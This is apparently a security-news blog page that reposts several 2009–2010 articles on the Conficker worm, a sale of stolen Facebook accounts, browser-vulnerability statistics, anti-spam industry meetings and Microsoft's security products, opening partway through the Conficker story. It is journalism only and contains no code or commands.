By early 2009, Conficker B had infected millions of machines. It had invaded the United Kingdom’s Defense Ministry. As CBS prepared a 60 Minutes segment on the worm, its computers were struck. In both instances, security experts scrambled to uproot the invader, badly disrupting normal functioning of the system. Conficker now had the world’s attention. In February 2009, the cabal became more formal. Headed initially by a Microsoft program manager, and eventually by Joffe, it became the Conficker Working Group. Microsoft offered a $250,000 bounty for the arrest and conviction of the worm’s creators.

The newly named team went to work trying to corral Conficker B. Getting rid of it was out of the question. Even though they could scrub it from an infected computer, there was no way they could scrub it from all infected computers. The millions of machines in the botnet were spread all over the world, and most users of infected ones didn’t even know it. It was theoretically feasible to unleash a counter-worm, something to surreptitiously enter computers and take out Conficker, but in free countries, privacy laws frown on invading people’s home computers. Even if all the governments got together to allow a massive attack on Conficker—an unlikely event—the new version of the worm had new ways of evading the threat.

Conficker C appeared in March 2009, and in addition to being impressed by its very snazzy crypto, the Conficker Working Group noticed that the new worm’s code threatened to up the number of domain names generated every day to 50,000. The new version would begin generating that many domain names daily on April 1. At the same time, all computers infected with the old variants of Conficker that could be reached would be updated with this new strain. The move suggested that the bad guys behind Conficker understood not just cryptology, but also the mostly volunteer nature of the cabal.

“You know you’re dealing with someone who not only knows how botnets work, but who understands how the security community works,” Andre’ DiMino told me. “This is not just a bunch of organized criminals that, say, commission someone to write a botnet for them. They know the challenges that the security community faces internally, politically, and economically, and are exploiting them as well.”

The bad guys knew, for instance, that preregistering even 250 domain names a day at $10 a pop was doable for the good guys. As long as the number remained relatively small, the cabal could stay ahead of them. But how could the good guys cope with a daily flood of 50,000? It would require an unprecedented degree of cooperation among competing security firms, software manufacturers, nonprofit organizations like Shadowserver, academics, and law enforcement.

“You can’t just register all 50,000—you’ve got to go one by one and make sure the domain name doesn’t already exist,” Joffe says. “And if it exists, you’ve got to make sure that it belongs to a good guy, not a bad guy. You’ve got to make a damn phone call for any of the new ones, and have to send someone out there to do it—and these are spread all over the world, including some very remote places, Third World countries. Now the bar had been raised to a level that was almost insurmountable.”

The worm was already running rings around the good guys, and then, just for good measure, it planted a pie in their faces on, of all days, April 1. By playing with the new variant in their sandboxes, the cabal knew that the enhanced domain-name-generating algorithm would click in on that day. If the update succeeded, it would be a game-changer. It was the most dramatic moment since Conficker had surfaced the previous November. Apparently, at long last, this extraordinary tool was going to be put to use. But for what? The potential was scary. Few people outside the upper echelon of computer security even understood what Conficker was, much less what was at stake on April 1, but word of a vague impending digital doomsday spread. The popular press got hold of it. There were headlines and the usual spate of ill-informed reports on cable TV and the Internet. When the day arrived, those who had been warning about the dangers of this new worm were sure to see their fears vindicated.

The cabal mounted a heroic effort to shut down the worm’s potential command centers in advance of the update, coordinating directly with the Internet Corporation for Assigned Names and Numbers, the organization that supervises registries worldwide. “It was our finest hour,” Joffe says.

“I don’t think that the bad guys could have expected the research community to come together as it did, because it was pretty unprecedented,” Ramses Martinez, director of information security for VeriSign, told me. “That was a new thing that happened. I mean, if you would have told me everybody’s going to come together—by everybody, I mean all these guys in this computer-security world that know each other—and they’re going to do this thing, I would have said, ‘You’re crazy.’ I don’t think the bad guys could have expected that.”

Much of the computer world was watching, in considerable suspense, to see what would happen on April 1. It was like the moment in a movie when the bad guy at last has cornered the hero. He pulls out an enormous gun and aims it at the hero’s head, pulls the trigger … and out pops a little flag with the word BANG!

Conficker found one or two domain names that Joffe’s group had missed, which was all it needed. The cabal’s efforts had succeeded in vastly reducing the number of machines that got the update, but the ones that did went to work distributing a very conventional, well-known malware called Waledac, which sends out e-mail spam selling a fake anti-spyware program. The worm was used to distribute Waledac for two weeks, and then stopped.

But something much more important had happened. The updated worm didn’t just up the ante by generating 50,000 domain names daily; it effectively moved the game out of the cabal’s reach.

“April 1 came and went, and in the middle of that night the systems switched over to the new algorithm,” Conficker C, Joffe told me. “That’s all that was supposed to happen, and it happened. But the Internet didn’t get infected; it was just an algorithm change in the software. So of course the press said, ‘Conficker is a bust.’”

Public concern over the worm fizzled, just as the problem grew worse: the new version of Conficker introduced peer-to-peer communications, which was disheartening to the good guys, to say the least. Peer-to-peer operations meant the worm no longer had to sneak in through Windows Port 445 or a USB drive; an infected computer spread the worm directly to every machine it interacted with. It also meant that Conficker no longer needed to call out to a command center for instructions; they could be distributed directly, computer to computer. And since the worm no longer needed to call home, there was no longer any way to tell how many computers were infected.

In the great chess match, the worm had just pronounced “Checkmate.”

Watching and Waiting

As of this writing, 17 months after it appeared and about a year after the April 1 update, Conficker has created a stable botnet. It consists of anywhere from hundreds of thousands of computers to 12 million. No one knows for sure anymore, because with peer-to-peer communications, the worm no longer needs to check in with an outside command center, which is how the good guys kept count. Joffe estimates that with the four distinct strains (yet another one appeared on April 8, 2009), 6.5 million computers are probably infected.

The investigators see no immediate chance or even any effective way to kill it.

“There are a bunch of infected machines that are out there, and they can be taken over, given the right circumstances, by the bad guys,” VeriSign’s Martinez says. “Will they do that? I don’t know. So it’s a potential threat. It’s something that’s out there, sitting there, and it needs to be addressed, but I don’t think, honestly, that we know how. How do we address this? If it was sitting in the U.S., it would be a fairly easy thing to do. The fact is that it’s spread out all around the world.”

Ever since the paltry Waledac scam, the worm has been biding its time.

“They are watching us watch them,” says Andre’ DiMino, the botnet hunter. “I think it’s really either that or somebody let this thing get bigger, and it’s advanced bigger and further than they ever dreamed possible. A lot of people think that. But in looking at the sophistication of this thing and looking at the evolution of this thing, I think they knew exactly what they were doing. I think they were trying something, and I think that they’re too smart to do what everybody figured they were going to do. You have to remember, the world was watching this thing and waiting for the world to end from Conficker on April 1, 2009. The last thing you’d want to do if you’re the bad guy is make something happen on April 1. You’re never going to do that, because everybody’s watching it. You’re going to do something when you’re least suspected. So these guys are sophisticated. They have good code. And just even seeing the evolution from Conficker A to B to C, where there’s the peer-to-peer component, which … strikes fear into the heart of botnet hunters because it’s just so damn difficult to track—these guys know exactly what they’re doing.”

So who are they?

One of the things Martinez’s team does, patrolling the perimeter at VeriSign looking for threats, is dip into the obscure digital forums where cyber criminals converse. Those who are engaged in writing sophisticated malware boast and threaten and compare notes. The good guys venture in to collect intelligence, or just out of curiosity, or for fun. They sometimes pretend to be malware creators themselves, sometimes not. Sometimes they engage in a little cyber trash talk.

“In the past you were just sort of making sure they didn’t steal your proprietary information,” Martinez says. “Now we go in to engage them. You talk to them and you exchange information. You have a guy in Russia selling malware, working with a guy in Mexico doing phishing attacks, who’s talking to a kid in Brazil, who’s doing credit-card fraud, and they’re introducing each other to some guy in China doing something else.”

Martinez said he recently eavesdropped on a dialogue between a security researcher and a man he suspects was at least partly responsible for Conficker. He wouldn’t say how he drew that connection, only that he had good reasons for believing it to be true. The suspect in the conversation was eastern European. The standard image of a malware creator is the Hollywood one: a brilliant 20-something with long hair and a bad attitude, in need of a bath. This is not how Martinez sees his nemesis—or nemeses.

“I see him, or them, as a really well-educated, smart businessman,” he said. “He may be 50 years old. These guys are not chumps. They’re not just out to make a buck.”

The eastern European, backpedaling from further dialogue with the security geek, wrote, “You’re the good guys; we’re the bad guys. Bacillus can’t live with antibodies.”

“Now, I didn’t grow up in a bad neighborhood or anything,” said Martinez, “but the few thugs that I saw would never use a word like bacillus or make an analogy like that.”

One of the early clues in the hunt was the peculiarity in the Conficker code that made computers with active Ukrainian keyboards immune. Much of the world’s aggressive malware comes from eastern Europe, where there are high levels of education and technical expertise, and also thriving organized criminal gangs. Martinez believes Conficker was written by a group of highly skilled programmers. Like Joffe, he sees it as a group of creators, because designing the worm required expertise in so many different disciplines. He suspects that these skilled programmers and technicians either were hired by a criminal gang, or created the worm as their own illicit business venture. If that’s true, then the Waledac maneuver was like flexing Conficker’s pinkie—just a demonstration, a way of showing that despite the best and most concerted effort of the world’s computer-security establishment, the worm was fully operational and under their control.

Will they be caught?

“I have no idea,” Martinez says. “I would say probably not. I’ll be shocked if they’re ever arrested. And arrest them for what? Is breaking into people’s computers even illegal where they’re from? Because in a lot of countries, it isn’t. As a matter of fact, in some countries, unless you’re touching a computer in their jurisdiction, their country, that’s not illegal. So who’s going to arrest them, even if we know who they are?”

Ridding computers of the worm poses another kind of overwhelming problem.

“There are controls, or checks and balances, in place to limit what police can do, because we have civil liberties to protect,” he says. “If you do away with these checks and balances, where the government can come in and reimage your computer overnight, now you’re infringing on people’s civil liberties. So, I mean, we can talk about this all day, but I’ll tell you, it’s going to be a long time, in my opinion, before we really see the government being able to effectively deal with cyber crime, because I think we’re still learning as a culture, as a nation, and as a world how to deal with this stuff. It’s too new.”

Imagining Conficker’s creators as a skilled group of illicit cyber entrepreneurs remains the prevailing theory. Some of the good guys feel that the worm will never be used again. They argue that it has become too notorious, too visible, to be useful. Its creators have learned how to whip computer-security systems worldwide, and will now use that knowledge to craft an even stealthier worm, and perhaps sell it to the highest bidder. Few believe Conficker itself is the work of any one nation, because other than the initial quirk of the Ukrainian-keyboard exemption, it spreads indiscriminately. China is the nation most often suspected in cyber attacks, but there may be more Conficker-infected computers in China than anywhere else. Besides, a nation seeking to create a botnet weapon is unlikely to create one as brazen as Conficker, which from the start has exhibited a thumb-in-your-eye, catch-me-if-you-can personality. It is hard to imagine Conficker’s creators not enjoying the high level of cyber gamesmanship. The good guys certainly have.

“It’s cops and robbers, so to speak, and that was a really interesting aspect of the work for me,” says Martinez. “It’s guys trying to outwit each other and exploit vulnerabilities in this vast network. “

In chess, when your opponent checkmates you, you have no recourse. You concede and shake the victor’s hand. In the real-world chess match over Conficker, the good guys have another recourse. They can, in effect, upend the board and go after the bad guys physically. Which is where things stand. The hunt for the mastermind (or masterminds) behind the worm is ongoing.

“It’s an active investigation,” Joffe says. “That’s all I can say. Law enforcement is fully engaged. We have some leads. This story is not over.”

This article available online at: http://www.theatlantic.com/magazine/archive/2010/06/the-enemy-within/8098/

A hacker named Kirllos has a rare deal for anyone who wants to spam, steal or scam on Facebook: an unprecedented number of user accounts offered at rock-bottom prices.

Researchers at VeriSign's iDefense group recently spotted Kirllos selling Facebook user names and passwords in an underground hacker forum, but what really caught their attention was the volume of credentials he had for sale: 1.5 million accounts.

IDefense doesn't know if Kirllos' accounts are legitimate, and Facebook didn't respond to messages Thursday seeking comment. If they are legitimate, he has the account information of about one in every 300 Facebook users. His asking price varies from US$25 to $45 per 1,000 accounts, depending on the number of contacts each user has.

To date, Kirllos seems to have sold close to 700,000 accounts, according to VeriSign Director of Cyber Intelligence Rick Howard.

Hackers have been selling stolen social-networking credentials for a while -- VeriSign has seen a brisk trade in names and passwords for Russia's VKontakte, for example. But now the trend is to go after global targets such as Facebook, Howard said.

Facebook has more than 400 million users worldwide, many of whom fall victim to scams each day. In one such scam, criminals send out messages from a compromised account, telling friends that the account's owner is trapped in a foreign country and needs money to get home.

In another, they send Web links that lead to malicious software, telling friends that it's a hilarious or sensationalistic video.

"People will follow it because they believe it was a friend that told them to go to this link," said Randy Abrams, director of technical education with security vendor Eset. Once the malware gets installed, criminals can steal more passwords, break into bank accounts, or simply use the computers to send spam or launch distributed denial of service attacks. "There's just a plethora of things that people can do if they can trick people into installing their software," he said.

Kirllos' Facebook prices are extremely cheap compared to what others are charging. In its most recent Internet Security Threat Report, Symantec found that e-mail usernames and passwords typically went for between $1 to $20 per account -- Kirllos wants as little as $0.025 per Facebook account. More coveted credit card or bank account details can go for much more, ranging between $0.85 to $30 for credit card numbers to $15 to $850 for top-quality online bank accounts.

[via www.pcworld.com]

Hacker bietet 1,5 Millionen Facebook-Konten zum Verkauf

"Kirllos" bietet rund 1,5 Millionen Facebook-Zugangsdaten im Netz zum Verkauf an. Dabei sind die Preise überraschend billig: Für 1000 Konten fordert er zwischen 25 und 45 Dollar. 700.000 Accounts soll Kirllos bereits verscherbelt haben. Ein Ende ist nicht in Sicht.

Schon lange ist es kein Geheimnis mehr, dass soziale Netzwerke wie Facebook und StudiVZ Datenschützern und Verbraucherschützern ein Dorn im Auge sind. Die Skepsis ist nicht unbegründet, denn immer wieder kommt es zu überraschenden Datenlecks, die auf unklare Datenschutzbestimmungen und ein unverantwortliches Verhalten seitens der Nutzer zurückzuführen sind. Auch der neueste Fall lässt zahlreiche Netzaktivisten aufschrecken. Einem Bericht von "PC World" zufolge bietet der russischstämmige Hacker "Kirllos" rund 1,5 Millionen Zugangsdaten des sozialen Netzwerks Facebook zum Verkauf an. Mit Schleuderpreisen versucht der Hacker die Kunden auf seine Seite zu gewinnen. Für Datensätze von 1000 Konten verlangt er nur 25 bis 45 US-Dollar. 700.000 Accounts konnte "Kirllos" auf diese Weise bereits zu Geld machen.

Auf das Angebot des Hackers sei man erstmals in einem bekannten Hacker-Forum aufmerksam geworden. Schnell habe sich die Offerte von "Kirllos" in Kennerkreisen herumgesprochen, da die Preise ungewöhnlich niedrig waren. Während man in der Regel ein bis 20 US-Dollar pro Account einfordere, biete der russischstämmige Hacker die Accounts zu Schnäppchenpreisen an, heißt es. Mit durchschnittlich nicht einmal zwei Cent pro Account sei der Preis in diesem Fall überraschend günstig. Je nachdem, wie viele Freunde die jeweiligen Konten aufzuweisen haben, variiere der Preis der Datensätze. Für die Preisgestaltung sei auch die Aktivität des Nutzers von großer Bedeutung.
Welche Nutzer es getroffen hat, ist noch nicht bekannt. In Anbetracht der Tatsache, dass Facebook derzeit mehr als 400 Millionen Benutzer zählt und der Hacker "Kirllos" im Besitz von 1,5 Millionen Accounts ist, scheint das Ausmaß jedoch überwältigend. Sollten die Angaben stimmen, hätte der Hacker Zugang auf ungefähr jedes 267ste Konto.

[via www.gulli.com]

New study places Firefox at the top of vulnerability list for for the first half of 2009:

Application security vendor Cenzic today released its security trends report for the first half of 2009 application. In it, Cenzic claims that the Mozilla's Firefox browser led the field of Web browsers in terms of total vulnerabilities.

According to Cenzic, Firefox accounted for 44 percent of all browser vulnerabilities reported in the first half of 2009. In contrast, Apple's Safari had 35 percent of all reported browser vulnerability, Microsoft's Internet Explorer was third at 15 percent and Opera had just six percent share.

The 2009 figures stand in contrast to Cenzic's Q3/Q4 2008 report, where IE accounted for 43 percent of all reported Web browser vulnerabilities and Firefox followed closely at 39 percent.

As to why Firefox's numbers were so high, Cenzic has a few ideas.

"It's a combination of different things," Lars Ewe, CTO of Cenzic, told InternetNews.com. "They've gotten more traction as a browser, which is good for them and the more you get used the more exposure you have. As well a fair amount of the vulnerabilities have come by way of plug-ins."

One key area that Ewe said was responsible for a number of reported Firefox vulnerabilities is with how the browser handles plug-ins.

"The plug-in architecture that they have is a selling fact for the browser and one of the reasons why I love using it," Ewe said. "They can't control security aspects of all the plug-ins and the vulnerabilities are a side effect of that."

Mozilla has made numerous efforts this year to bolster its plug-in security. Recently they launched a plug-in checker service to ensure that users are running up-to-date versions. The Firefox 3.0.9 update, which came out in April, specifically addressed several key plug-in vulnerabilities.

Though Firefox had the highest number of vulnerabilities, that doesn't necessarily mean that Firefox users were more vulnerable.

Ewe said that Cenzic looked at all reported vulnerabilities. There is no specific differentiation for zero day bugs in the browser vulnerability count either. All that raises the question of how Cenzic actually came up with their vulnerability counts in the first place.

"The process that we follow is looking at a number of different vulnerability databases and sources that we have and trying to come up with a fair percentage based on the deviations we see between the databases," Ewe said. "You could make the argument, that's its 40 percent or 42 percent and there might be some variation on how you analyze it, but certainly it's not off by 20 percent."

While the Cenzic report shows Firefox at the top of the browser vulnerability pile, Ewe was quick to note that Cenzic uses Mozilla technology within its own solutions.

"Full disclosure here, Mozilla plays an important role in Cenzic's solution," Ewe said. "We are actually sitting on top of Mozilla as our agent of preference for scanning sites."

Cenzic develops an application scanning solution that uses the underlying Mozilla browser technology to test out security on Web site insides of a real browser context.

"We have a technology that we refer to as stateful assessment technology," Ewe said. "The idea behind it is to have as faithful an interaction with a Web site as possible and to determine vulnerabilities not on simple signatures but on behavioral basis of the application."

Ewe explained that when you do a cross-site scripting attack with a signature-based approach you'd just look for a server response that would indicate that the script tag has been injected. He added that the problem with that approach is that it's not faithful and the security researcher doesn't know if there is any additional logic on the client side that takes care of the script tag.

"If you want to be really faithful in the process you need to have full rendering capabilities and have all the JavaScript event handling," Ewe said. "So we leverage the entire Firefox architecture in order for us to actually have as faithful an interaction with a server as possible and maintain the client state. That results in low false-positives."

Source: www.internetnews.com

The people who run the world's internet systems are a rather secretive bunch.  Three times a year, senior technical officers from companies such as Google, Yahoo, AT&T, Comcast and Verizon meet to discuss ways of stopping the internet from being swamped by rising levels of spam, viruses and hacking attacks by organised criminals. They do not generally like discussing these meetings.  "Some people might get nervous if they knew all the things we talked about," said Michael O'Rierdan, chairman of the Messaging Anti-Abuse Working Group (MAAWG). "It’s our job to make the internet safe, but we don't want to put people off using the web."  They are also worried about being targeted by the cyber-criminals they are trying to thwart.

Most of the spam and hacking on the internet is run by organised crime rings. There is an underground economy that hacks into computers, sells stolen identities and orchestrates the sending of spam e-mails about everything from fake Viagra pills to banking scams. There is a lot of money at stake in keeping these operations running.  “We get threats every day," said Larry, chief technical officer of Spamhaus, a non-profit organisation that exposes spammers. He prefers not to reveal his surname. "In the US it is people bringing lawsuits against us. And then there are organised criminals in Russia and Ukraine, who use different methods."  Steve Linford, the organisation's founder, has been advised by police not to open unexpected packages arriving at his home.

MAAWG meetings are also places to discuss some of the controversial measures that internet companies need to take in the fight against spam, such as blocking some types of e-mail traffic. This measure sits awkwardly with civil liberties bodies.  The 270 delegates from 19 countries who met at Amsterdam's venerable Hotel Krasnapolsky last week were far from the usual, suit-wearing conference crowd. An eclectic mix of tattoos, ponytails, high-waisted trousers and backpacks indicated that these were true operations people who work in the bowels of the network.  Membership is strictly vetted and journalists are not normally invited to attend, but MAAWG has started to lift its veil a little. There is a growing feeling that the industry must reach out to consumers and get them to help fight cyber-crime.

In 2008, 349.6bn spam messages were sent across the internet, according to Symantec, the internet security company. Spam accounts for an average of almost 94 per cent of all e-mail messages.  Nearly 90 per cent of spam is sent from computers that have been hacked into and are being remotely programmed to send out spam.  More than 9.4m computers have been hijacked in this way and their owners are usually entirely unaware it is going on. It will be impossible to clean up these machines without talking to consumers.

"Sometimes we want people to know what we are doing, so they can yell at the politicians to give us more help," said Jerry Upton, executive director of MAAWG.  There is a rising sense of crisis among internet companies about the cost of spam. Few are willing to quantify how much they have to spend to fight spam, but Mr O'Rierdan estimated that big internet service providers employ five to 10 staff just to look at spam. In addition they must buy spare servers, routers and other equipment to cope with the volumes of junk mail, buy spam-filtering software and run support centers for their customers.

Viriya Upatising, chief technical officer of True Internet, a Thai internet service provider, said junk mail was a crippling cost for the company because it was paying to send the unwanted data across undersea cable connections to destinations such as the US and Europe.  "The cost of bandwidth is expensive in Asia," Mr Upatising said. "It costs us $250 per megabit per month to send data internationally."  The company put in place a draconian system that prevents suspected spammers from using its network. The measures have cut unwanted messages from 3.5m a day to a more manageable 250,000.

"We are all sharing these costs," said Patrick Peterson, chief technology officer at Ironport Systems, Cisco's e-mail security arm. "Spam is a stealth tax on consumers. ISPs have to pay for the spam, for the extra bandwidth, for equipment, and they are forced to put up their prices for consumers."

There is a fear among internet security professionals that they might be losing the battle to cyber-criminals. This may also be why they now want the public to know more about what they do, to show they have at least tried.  "I don't know if we can control it," said Dave Crocker, one of the early pioneers of e-mail and now a senior technical adviser to MAAWG.  He added: "It is an arms race. We are getting better at filtering out rogue messages but every day the criminals get better too, and they are better organized and more aggressive."

Keywords: the dark side of the web

* Spam: Unsolicited electronic messages, most commonly e-mail, but also increasingly common in instant messaging, blogs and mobile phone messages. The first e-mail spam is believed to have been sent in 1978.

* Malware: Malicious software designed to infiltrate or damage a computer system without the owners' consent. Symantec, the internet security company, has estimated there is now more malware released each year than legitimate software programs. There are many different types of malware, including viruses, worms and Trojan horses.

* Phishing : The fraudulent attempt to acquire sensitive information such as passwords, bank account details and credit card numbers. Typically it is in the form of an e-mail that directs people to a fake website - that looks like the legitimate site of a bank or other trusted organisation - where people are asked to enter personal details.

* Botnets: A network of computers that have been hacked and are being remotely controlled by cyber-criminals. Typically they are used to send out spam messages or viruses in large numbers. Most users will be unaware if their computer has been infiltrated and added to a botnet. Symantec estimated there were more than 9.4m machines hijacked in this way in 2008.

Source: http://www.ft.com

BOSTON, June 10 (Reuters) Microsoft Corp (MSFT.O) is getting ready to unveil a long-anticipated free anti-virus service for personal computers that will compete with products sold by Symantec Corp (SYMC.O) and McAfee Inc (MFE.N).

A Microsoft spokesman said on Wednesday that the world's biggest software maker is testing an early version of the product with its own employees. Microsoft would "soon" make a trial version, or product beta, available via its website, he added, but declined to provide a specific date.

Symantec shares fell 0.5 percent on Nasdaq and McAfee fell 1.3 percent on the New York Stock Exchange, while Microsoft was up 2.1 percent. The Nasdaq composite index .IXIC was down 0.47 percent.

Investors are closely monitoring the free service, code-named Morro after Brazil's Morro de Sao Paolo beach, amid concern it could hurt sales of products from Symantec and McAfee, which generate billions of dollars of revenue a year protecting Windows PCs from attacks by hackers.

"It's a long-term competitive threat," said Daniel Ives, an analyst with FBR Capital Markets, though he added that the near-term impact was minimal.

Microsoft has said that Morro will offer basic features for fighting a wide range of viruses, which would likely make it comparable to low-end consumer products from Symantec and McAfee that cost about $40 per year.

Their top-selling products are security suites that come with features including encryption, firewalls, password protection, parental controls and data backup.

Three years ago, Microsoft entered that market with Live OneCare, which turned out to be a commercial flop. It announced plans in November to kill that product suite, saying it would launch the free Morro service by the end of 2009.

Analysts said they are looking forward to Morro's beta to see exactly how its features compare to those in products from competitors.

Microsoft has said it will provide protection from several types of malicious software including viruses, spyware, rootkits and trojans.

Officials with Symantec and McAfee have said they do not see Morro as a threat. 

"Microsoft's free product is basically a stripped down version of the OneCare product Microsoft pulled from the shelves," said Symantec Consumer division president Janice Chaffin. "A full Internet security suite is what consumers require today to stay fully protected."

Joris Evers, a spokesman for No. 2 security software maker McAfee, said his company is already enjoying strong growth despite competition from free anti-virus products that are on the market.

"On a level playing field, we are confident in our ability to compete with anyone who might enter the marketplace," he said.

A spokeswoman for Trend Micro Inc (4704.T), the No. 3 player, declined to comment. (Reporting by Jim Finkle; Editing by Steve Orlofsky, Brian Moss, Richard Chang)

Source: http://www.reuters.com

Microsoft will begin offering its first hosted security service under the Forefront brand on Thursday, dubbed Forefront Online Security for Exchange and designed to help keep malware and spam out of e-mail in-boxes.

The hosted service, which will cost $20 per user per year or less based on volume licensing, targets enterprise Exchange customers and includes a Web-based console for setting up policies for virus and spam protection, said Doug Leland, general manager of Microsoft's Identity and Security Business Group.

The releases will follow the timeline of Exchange 2010, which entered public beta this week. More hosted security services will be coming but Leland declined to elaborate.

Microsoft also will finally release on Thursday a new, public beta version of its Stirling security suite, which is the next generation of the Forefront software.

The initial beta version of Stirling was released a year ago and was supposed to be refreshed by the end of 2008. It will include client, server, and application security technology and offer a single management console.

Stirling components will come in staggered releases starting later this year with Forefront Security for Exchange and Threat Management and continuing through the first half of 2010, Leland said. The company also is changing the name of its Identity Lifecycle Manager product to Forefront Identity Manager and plans to offer a new set of technologies, code-named Geneva, for helping corporations improve the security of software and services, Microsoft said.

In addition, Microsoft said it is investing $75 million in a partner ecosystem, including making a strategic partnership with RSA. Other companies integrating with Stirling include Kaspersky, Brocade, Juniper Networks, Guardium, Imperva, Sourcefire, StillSecure, Q1 Labs, and Tipping Point.

The moves are part of the company's strategy to provide "Business Ready Security."

The moves are part of Microsoft's effort to broaden the scope of its security offerings to incorporate data protection, access and management, all built around the concept of identity, Leland said.

Microsoft wants to offer the ability for corporations to set "fine-grained security policies and have a deeper understanding about who in the organization is triyng to access data and what they are trying to do with it," he said.

Source: http://news.cnet.com

[Update]: Forefront Online Security for Exchange is not only limited to Exchange Server, it can be used by all other mail server.

More than 97% of all e-mails sent over the net are unwanted, according to a Microsoft security report.

The e-mails are dominated by spam adverts for drugs, and general product pitches and often have malicious attachments.

The report found that the global ratio of infected machines was 8.6 for every 1,000 uninfected machines.

It also found that Office document attachments and PDF files were increasingly being targeted by hackers.

Microsoft said people should not panic about the high levels of unwanted e-mail.

Cliff Evans, head of security and privacy for Microsoft in the UK, told BBC News: "The good news is that the majority of that never hits your inbox although some will get through."

Ed Gibson, chief cyber security advisor at Microsoft, said the rise in spam was due to traditional organised crime figures moving away from exploiting software vulnerabilities and "targeting the weak link that is you and me".

"With higher capacity broadband and better OS (operating systems), and higher power computers it is easier now to send out billions of spams. Three or four years ago the capacity wasn't there."

Malware ecosystem

Paul Woods, senior analyst at e-mail security firm Message Labs, said he was surprised the Microsoft figure for unwanted e-mail was so high.

"Our own analysis shows that around 81% of e-mail traffic we were processing was identified as spam and unwanted," he said.

MessageLabs said spam rates had fallen at the end of 2008 as an ISP which had been hijacked to send out spam mails to users had been taken offline.

"As a result of that, a number of developers in botnet technology at the end of last year were trying to regain botnet control and increase capacity and return to previous spam levels.

"It wont be far off before we see return to those levels."

The report, which looked at online activity during the second half of 2008, also pinpoints the countries that are suffering from the most infections of malicious software, or malware.

Russia and Brazil top the global chart of infections, followed by Turkey and Serbia and Montenegro.

It said that the type of malware varied from country to country.

"As the malware ecosystem becomes more reliant on social engineering, threats worldwide have become more dependent on language and cultural factors," it reported.

In China, several malicious web browser modifiers are common, while in Brazil, malware that targets users of online banks is more widespread.

In Korea, viruses such as Win32/Virut and Win32/Parite are common.

Global average

The global average for infected machines is 8.6 for every 1,000 uninfected PCs.

The UK's infection rate is 5.7, according to the Microsoft report.

The report highlighted the need to keep operating systems, web browsers and applications up to date with the latest versions.

Increasingly, hackers are using common file formats, such as Microsoft Office documents and Adobe's PDF format as the carrier of malicious exploits or programs.

More than 91% of attacks exploiting vulnerabilities in Microsoft Office were using security holes that had been plugged by updates that had been available for more than two years.

Attacks using PDF files rose sharply in the second half of 2008, the report noted.

The vulnerabilities all of the attacks exploited had already been fixed by Adobe, and were not present in the most recent versions of the software.

Mr Gibson told BBC News people had to be aware that if they did not update their applications, such as Office and Adobe, they were not just putting themselves at risk, but others on the internet also.

"If you don't update your software you are not just a hazard to yourself, you are hazard to others because you can be part of a botnet [if your computer is hijacked]."

Mr Evans said Microsoft was very happy with the approach consumers were taking to updating applications via automatic updates.

"For consumers it is happening but for business less so. We have encourage businesses to make more use of automatic updates."

Scareware

Mr Woods said malicious hackers were exploiting Office document attachments and PDF files in order to make more targeted attacks.

"They tend to be used in selective attacks to named individuals in organisations.

"A lot of social engineering will be used to appear legitimate and convince a user to open the attachment

"Once opened, a vulnerability in the application used to open the document will be exploited and often a tiny piece of code will execute and then download a larger file from a rogue website.

"This program will then attempt to search the computer for a particular document or file and sent it to a remote PC."

The report also highlighted the rise in the use of so-called scareware, fake security programs which falsely tell people they need to install software which does nothing other than attempt to steal personal details from a users' PC.

"It's criminals playing on people's fears," said Mr Evans.

"The advice remains the same - ensuring you have up to date software, whether that's your applications, your browser or your OS."

Source: http://news.bbc.co.uk

Remember the dire predictions surrounding the "millennium bug?" The doom-and-gloom scenarios bandied about by security analysts on how computers could act when their clocks turned to January 1, 2000?

Well, researchers are hoping that a potential April Fools' time bomb -- the Conficker.c that is supposed to hit computers on April 1 -- turns out to be equally unfounded.

But realizing that hope alone is not a prudent option, here is a primer on the worm so you can adequately prepare yourself -- and your computer.

Computer users will not know that Conficker.c has infected their machine.

What is Conficker.c and what do analysts fear it may do?

Conficker.c is a worm, a malicious program thought to have already infected between 5 million and 10 million computers.

Those infections haven't spawned many symptoms, but on April 1 a master computer is scheduled to gain control of these zombie machines, said Don DeBolt, director of threat research for CA, a New York-based IT and software company.

What happens on April Fools' Day is anyone's guess.

The program could delete all of the files on a person's computer, use zombie PCs -- those controlled by a master -- to overwhelm and shut down Web sites or monitor a person's keyboard strokes to collect private information like passwords or bank account information, experts said.

More likely, though, said DeBolt, the virus may try to get computer users to buy fake software or spend money on other phony products.

Experts said computer hackers largely have moved away from showboating and causing random trouble. They now usually try to make money off their viral programs

How does the Conficker.c work?

Conficker.c imbeds itself deep in the computer where it is difficult to track. The program, for instance, stops Windows from conducting automatic updates that could prevent it from causing damage.

The program's code is also written to evolve over time and its author appears to be making updates to thwart attempts to neuter the worm.

Who wrote the program?

It's unclear who wrote the program, but anti-work researchers -- a group calling itself the Conficker Cabal -- are looking for clues.

First, they know that some recent programs have come from Eastern European countries outside the jurisdiction of the European Union, said Patrick Morganelli, senior vice president of technology for Enigma Software.

Worm program authors often hide in those countries to stay out of sight from law enforcement, he said.

In a way, the Conficker Cabal is also looking for the program author's fingerprints. DeBolt said security researchers are looking through old programs to see if their programming styles are similar to that of Conficker C.

The prospects for catching the program's author are not good, Morganelli said. "Unless they open their mouth, they'll never be found," he said.

So, the most effective counter-assault simply may be damage control.

How can I tell if my computer's infected?

One quick way to see if your computer has been infected is to see if you have gotten automatic updates from Windows in March. If so, your computer likely is fine, DeBolt said.

Microsoft released a statement saying the company "is actively working with the industry to mitigate the spread of the worm."

Users who haven't gotten the latest Windows updates should go to http://safety.live.com if they fear they're infected, the company's statement says.

People who use other antivirus software should check to make sure they've received the latest updates, which also could have been disabled by Conficker.c.

How did the worm evolve?

The first version of Conficker -- strain A -- was released in late 2008. That version used 250 Web addresses -- generated daily by the system -- as the means of communication between the master computer and its zombies.

The end goal of the first line was to sell computer users fake antivirus software, said Morganelli.

Computer security experts largely patched that problem by working with the Internet Corporation for Assigned Names and Numbers to disable or buy the problematic URLs, he said.

A second variant, Conficker.b, was released in January and infected millions more machines.

The Conficker, strain C, will generate 50,000 URLs per day instead of just 250 when it becomes active, DeBolt said.

What is being done to fight Conficker?

Members are searching for the malicious software program's author and for ways to do damage control if he or she can't be stopped.

They're motivated in part by a $250,000 bounty from Microsoft.

Source: http://www.cnn.com

[QUOTE]
Reports about the massive infection of web sites by an automated tool, whose most recent prominent victims have been United Nations, UK Government and the U.S. Department of Homeland Security raised some recurring questions which are worth answering.

1. The attack is targeting Microsoft IIS web servers. Is there a Microsoft vulnerability?
2. What can I do if I’m the administrator of an infected site?
3. What should I do as an user to protect myself?
